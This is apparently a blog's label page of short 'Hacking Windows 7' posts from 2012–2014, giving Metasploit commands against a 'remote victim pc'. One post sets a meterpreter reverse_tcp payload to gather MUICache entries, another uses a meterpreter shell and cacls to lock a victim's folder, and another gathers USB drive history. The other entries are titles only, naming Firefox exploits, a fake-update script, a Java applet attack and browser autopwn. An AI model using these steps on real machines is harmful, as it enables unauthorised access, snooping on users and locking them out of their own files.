Showing posts with label Hacking Windows 7. Show all posts
Showing posts with label Hacking Windows 7. Show all posts

Friday, 11 July 2014

How to get MUICache Entries in Remote Windows Machine


According to Nirsoft.net, “each time that you start using a new application, Windows operating system automatically extract the application name from the version resource of the exe file, and stores it for using it later, in Registry key known as the ‘MuiCache’.”

use post/windows/gather/enum_muicache

msf exploit (enum_muicache)>set payload windows/meterpreter/reverse_tcp

msf exploit (enum_muicache)>set lhost 192.168.1.3 (IP of Local Host)

msf exploit (enum_muicache)>set session 2

msf exploit (enum_muicache)>exploit


Tuesday, 19 March 2013

How to lock and unlock folder in remote victim pc using metasploit

Once you got the meterpreter session use ‘shell‘command to get command prompt of  the target.

lock and unlock folder :

Once you got the meterpreter session use ‘shell‘command to get command prompt of  the target.
Type Cacls (Folder Name) /e /p everyone:n and press Enter.

VIDEO




Sunday, 17 March 2013

Windows Gather USB Drive History Metasploit Module

msf

This module will enumerate USB Drive history on a target host.


Usage Information


msf > use post/windows/gather/usb_history
msf post(usb_history) > set SESSION [INTEGER]

Module Options



















SESSIONThe session to run this module on.
VERBOSEEnable detailed status messages
WORKSPACESpecify the workspace for this module



Saturday, 24 November 2012

Mozilla Firefox 11 Bootstrapped Addon Social Engineering Code Execution in Windows



Description:

For More Information Click Here

Firefox 8/9 AttributeChildRemoved() Use-After-Free Vulnerability



Description:

More Information

For More Information Click Here

Viper FakeUpdate Script in Backtrack 5 R3



Description:

Download Viper FakeUpdate Script

For More Information Click Here

 

WebSploit Framework - Java Applet Attack in Backtrack 5 R3



Description:

For More Information Click Here

WebSploit Framework - Browser autopwn in Backtrack 5 R3



Description:

For More Information Click Here